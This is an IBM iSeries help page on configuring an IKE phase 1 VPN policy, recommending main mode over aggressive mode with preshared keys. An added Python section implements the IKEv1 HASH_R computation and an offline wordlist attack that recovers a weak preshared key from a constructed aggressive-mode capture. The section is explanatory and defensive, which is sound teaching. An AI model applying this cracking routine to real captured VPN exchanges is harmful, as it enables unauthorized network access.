<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xml:lang="en-us">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="security" content="public" />
<meta name="Robots" content="index,follow" />
<meta http-equiv="PICS-Label" content='(PICS-1.1 "http://www.icra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<meta name="DC.Type" content="task" />
<meta name="DC.Title" content="Configure an Internet Key Exchange (IKE) policy" />
<meta name="abstract" content="The IKE policy defines what level of authentication and encryption protection IKE uses during phase 1 negotiations." />
<meta name="description" content="The IKE policy defines what level of authentication and encryption protection IKE uses during phase 1 negotiations." />
<meta name="DC.Relation" scheme="URI" content="rzajavpnpolicy.htm" />
<meta name="DC.Relation" scheme="URI" content="rzajasecassociations.htm" />
<meta name="DC.Relation" scheme="URI" content="../rzahu/rzahurazhudigitalcertmngmnt.htm" />
<meta name="copyright" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Rights.Owner" content="(C) Copyright IBM Corporation 2000, 2006" />
<meta name="DC.Format" content="XHTML" />
<meta name="DC.Identifier" content="rzajaprotectyourkeys" />
<meta name="DC.Language" content="en-us" />
<!-- All rights reserved. Licensed Materials Property of IBM -->
<!-- US Government Users Restricted Rights -->
<!-- Use, duplication or disclosure restricted by -->
<!-- GSA ADP Schedule Contract with IBM Corp. -->
<link rel="stylesheet" type="text/css" href="./ibmdita.css" />
<link rel="stylesheet" type="text/css" href="./ic.css" />
<title>Configure an Internet Key Exchange (IKE) policy</title>
</head>
<body id="rzajaprotectyourkeys"><a name="rzajaprotectyourkeys"><!-- --></a>
<!-- Java sync-link --><script language="Javascript" src="../rzahg/synch.js" type="text/javascript"></script>
<h1 class="topictitle1">Configure an Internet Key Exchange (IKE) policy</h1>
<div><p>The IKE policy defines what level of authentication and encryption
protection IKE uses during phase 1 negotiations.</p>
<div class="section"><p>IKE phase 1 authenticates the two key servers and establishes the keys that protect the messages that
flow in the subsequent phase 2 negotiations. You do not need to define an
IKE policy when you create a manual connection, because a manual connection uses keys that you enter yourself
rather than keys negotiated by IKE. In addition, if you create
your VPN with the New Connection wizard, the wizard can create your IKE policy
for you.</p>
<p>VPN uses either RSA signature mode or preshared keys to authenticate
phase 1 negotiations. If you plan to use digital certificates for authenticating
the key servers, you must first configure them by using the <span class="keyword">Digital Certificate Manager</span>
(5722-SS1 Option 34). The IKE policy also identifies which remote key server
will use this policy.</p>
<p>To define an IKE policy or make changes to an
existing one, follow these steps:</p>
</div>
<ol><li><span>In <span class="keyword">iSeries™ Navigator</span>, expand
your <span class="menucascade"><span class="uicontrol">server</span> > <span class="uicontrol">Network</span> > <span class="uicontrol">IP Policies</span> > <span class="uicontrol">Virtual Private Networking</span> > <span class="uicontrol">IP Security Policies</span></span>.</span></li>
<li><span>To create a new policy, right-click <span class="uicontrol">Internet Key Exchange
Policies</span> and select <span class="uicontrol">New Internet Key Exchange Policy</span>.
To make changes to an existing policy, click <span class="uicontrol">Internet Key Exchange
Policies</span> in the left pane, then right-click the policy you want
to change in the right pane and select <span class="uicontrol">Properties</span>.</span></li>
<li><span>Complete each of the property sheets. Click <span class="uicontrol">Help</span> if
you have questions about how to complete a page or any of its fields.</span></li>
<li><span>Click <span class="uicontrol">OK</span> to save your changes.</span></li>
</ol>
<div class="section">It is recommended that you use main mode negotiation whenever a preshared
key is used for authentication. Main mode provides a more secure exchange: the identity and hash payloads
are encrypted, so a passive observer captures nothing that it can test candidate preshared keys against.
In aggressive mode those payloads are sent in the clear, and an attacker who records a single exchange
can run an offline dictionary attack against the preshared key. If you
must use preshared keys and aggressive mode negotiation, select long, randomly generated preshared keys
that are unlikely to be cracked by dictionary attacks. It is
also recommended that you change your preshared keys periodically. To force a key exchange
to use main mode negotiation, perform the following tasks: <ol><li>In <span class="keyword">iSeries Navigator</span>, expand your
<span class="menucascade"><span class="uicontrol">server</span> > <span class="uicontrol">Network</span> > <span class="uicontrol">IP Policies</span></span>. </li>
<li>Select <span class="menucascade"><span class="uicontrol">Virtual Private Networking</span> > <span class="uicontrol">IP Security Policies</span> > <span class="uicontrol">Internet Key Exchange
Policies</span></span> to view the currently defined key exchange
policies within the right-hand pane.</li>
<li>Right-click a particular key exchange policy and select <span class="uicontrol">Properties</span>. </li>
<li>On the Transforms page, click <span class="uicontrol">Responding Policy</span>.
The Responding Internet Key Exchange Policy dialog appears. </li>
<li>In the Identity protection field, deselect <span class="uicontrol">IKE aggressive mode
negotiation (no identity protection)</span>. </li>
<li>Click <span class="uicontrol">OK</span> to return to the Properties dialog.</li>
<li>Click <span class="uicontrol">OK</span> again to save your changes.</li>
</ol>
<div class="note"><span class="notetitle">Note:</span> Because there is only one responding
IKE policy for the entire system, a change to the identity protection field applies to exchanges
with all remote key servers. With aggressive mode deselected, an initiating
system can only negotiate phase 1 with this system in main mode.</div>
</div>
</div>
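<p>The recommendation above rests on a property of the IKEv1 aggressive-mode exchange: the responder's HASH_R, and every input to it other than the preshared key, travels unencrypted. The following Python example is added here and is not IBM's code or part of the original topic. It implements the RFC 2409 preshared-key derivation of HASH_R (assuming HMAC-SHA1 as the negotiated hash), builds a constructed aggressive-mode capture from fixed stand-in values rather than a real exchange, and runs an offline wordlist guess against it, so that a dictionary word is recovered and a randomly generated preshared key is not. The main-mode SKEYID_e function shows, for contrast, that the key protecting the same payloads in main mode depends on the Diffie-Hellman secret g^xy, which a passive observer never has.</p>

```python
"""
Added illustration (not IBM's code): why IKEv1 aggressive mode with a
preshared key needs a key that survives a dictionary attack.

For preshared-key authentication RFC 2409 defines

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)

with prf = HMAC keyed with the first argument (HMAC-SHA1 here, assuming SHA-1
was the negotiated hash). In aggressive mode the responder sends HASH_R and
every other input in the clear, so a passive observer can test PSK guesses
offline. Every exchange value below is constructed for the example; none of
it comes from a real capture.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, replace
from typing import Iterable, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf: HMAC over the negotiated hash, keyed with `key`."""
    return hmac.new(key, data, hashlib.sha1).digest()


@dataclass(frozen=True)
class AggressiveModeCapture:
    """What a passive observer sees in an aggressive-mode phase 1 exchange."""
    ni: bytes      # Ni_b, initiator nonce
    nr: bytes      # Nr_b, responder nonce
    gxi: bytes     # g^xi, initiator DH public value
    gxr: bytes     # g^xr, responder DH public value
    cky_i: bytes   # CKY-I, initiator cookie (8 bytes)
    cky_r: bytes   # CKY-R, responder cookie (8 bytes)
    sai_b: bytes   # SAi_b, body of the initiator's SA payload
    idir_b: bytes  # IDir_b, body of the responder's ID payload
    hash_r: bytes  # HASH_R, sent unencrypted in the responder's message


def compute_hash_r(psk: bytes, cap: AggressiveModeCapture) -> bytes:
    """HASH_R exactly as the responder computes it from the shared PSK."""
    skeyid = prf(psk, cap.ni + cap.nr)
    return prf(skeyid, cap.gxr + cap.gxi + cap.cky_r + cap.cky_i + cap.sai_b + cap.idir_b)


def main_mode_skeyid_e(psk: bytes, cap: AggressiveModeCapture, gxy: bytes) -> bytes:
    """In main mode HASH_R travels encrypted under SKEYID_e, which needs the DH
    shared secret g^xy (RFC 2409 section 5). A passive observer never has g^xy,
    so a captured main-mode exchange gives it nothing to test PSK guesses against."""
    skeyid = prf(psk, cap.ni + cap.nr)
    skeyid_d = prf(skeyid, gxy + cap.cky_i + cap.cky_r + b"\x00")
    skeyid_a = prf(skeyid, skeyid_d + gxy + cap.cky_i + cap.cky_r + b"\x01")
    return prf(skeyid, skeyid_a + gxy + cap.cky_i + cap.cky_r + b"\x02")


def build_capture(psk: bytes) -> AggressiveModeCapture:
    """Constructed exchange with fixed values so results are reproducible; a real
    exchange carries fresh nonces, cookies and DH values every time."""
    base = AggressiveModeCapture(
        ni=hashlib.sha256(b"constructed Ni").digest()[:16],
        nr=hashlib.sha256(b"constructed Nr").digest()[:16],
        gxi=hashlib.sha256(b"constructed g^xi").digest(),  # stand-in for a DH public value
        gxr=hashlib.sha256(b"constructed g^xr").digest(),
        cky_i=bytes.fromhex("0102030405060708"),
        cky_r=bytes.fromhex("1112131415161718"),
        sai_b=bytes.fromhex("000000010000000100000001"),  # stand-in for the SA payload body
        idir_b=b"\x02\x00\x00\x00" + b"vpn.example.com",  # ID_FQDN identity
        hash_r=b"",
    )
    return replace(base, hash_r=compute_hash_r(psk, base))


def recover_psk(cap: AggressiveModeCapture, candidates: Iterable[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: two HMACs per guess and no traffic to the VPN
    server, so nothing in the guessing phase shows up in its logs."""
    for guess in candidates:
        if hmac.compare_digest(compute_hash_r(guess, cap), cap.hash_r):
            return guess
    return None


def generate_psk(nbytes: int = 32) -> str:
    """A preshared key of the kind the page asks for: random, so no wordlist contains it."""
    return secrets.token_urlsafe(nbytes)


# Constructed wordlist standing in for the dictionary an attacker would use.
WORDLIST = [b"password", b"vpn", b"ibmvpn", b"Summer2006!", b"letmein", b"iseries"]

if __name__ == "__main__":
    weak = build_capture(b"Summer2006!")
    print("weak PSK recovered from aggressive-mode capture:", recover_psk(weak, WORDLIST))
    strong = build_capture(generate_psk().encode())
    print("random PSK recovered:", recover_psk(strong, WORDLIST))
```

<p>The guessing loop is what the page's advice on "obscure passwords" is defending against: once a single aggressive-mode exchange has been recorded, each candidate costs two HMAC computations and can be tried at any rate the attacker's hardware allows, so only a preshared key that is not in any wordlist, such as the output of <code>generate_psk</code>, holds up. Deselecting aggressive mode in the responding policy removes the cleartext HASH_R from the exchange altogether.</p>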
<div>
<div class="familylinks">
<div class="parentlink"><strong>Parent topic:</strong> <a href="rzajavpnpolicy.htm" title="After you determine how you will use your VPN you must define your VPN security policies.">Configure VPN security policies</a></div>
</div>
<div class="relconcepts"><strong>Related concepts</strong><br />
<div><a href="rzajasecassociations.htm" title="A dynamic VPN provides additional security for your communications by using the Internet Key Exchange (IKE) protocol for key management. IKE allows the VPN servers on each end of the connection to negotiate new keys at specified intervals.">Key management</a></div>
</div>
<div class="reltasks"><strong>Related tasks</strong><br />
<div><a href="../rzahu/rzahurazhudigitalcertmngmnt.htm">Digital Certificate Manager</a></div>
</div>
</div>
</body>
</html>